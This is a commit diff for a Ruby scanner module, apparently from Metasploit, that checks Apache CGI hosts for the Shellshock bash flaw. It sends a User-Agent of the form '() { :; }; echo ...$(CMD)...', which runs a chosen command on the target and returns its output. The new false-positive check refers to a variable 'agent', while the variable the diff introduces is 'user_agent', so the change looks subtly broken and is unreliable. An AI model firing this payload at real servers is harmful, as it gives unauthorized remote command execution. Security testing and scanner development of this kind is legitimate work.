Improve false positive check

Author: wvu

modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb

@@ -42,13 +42,16 @@ def initialize(info = {})
 
   def run_host(ip)
     marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
 
     res = send_request_raw(
       'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
-      'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
+      'agent' => user_agent
     )
 
+    return if (res && res.body.include?(agent))
+
     if res && res.body =~ /#{marker}(.+)#{marker}/m
       print_good("#{peer} - #{$1}")
       report_vuln(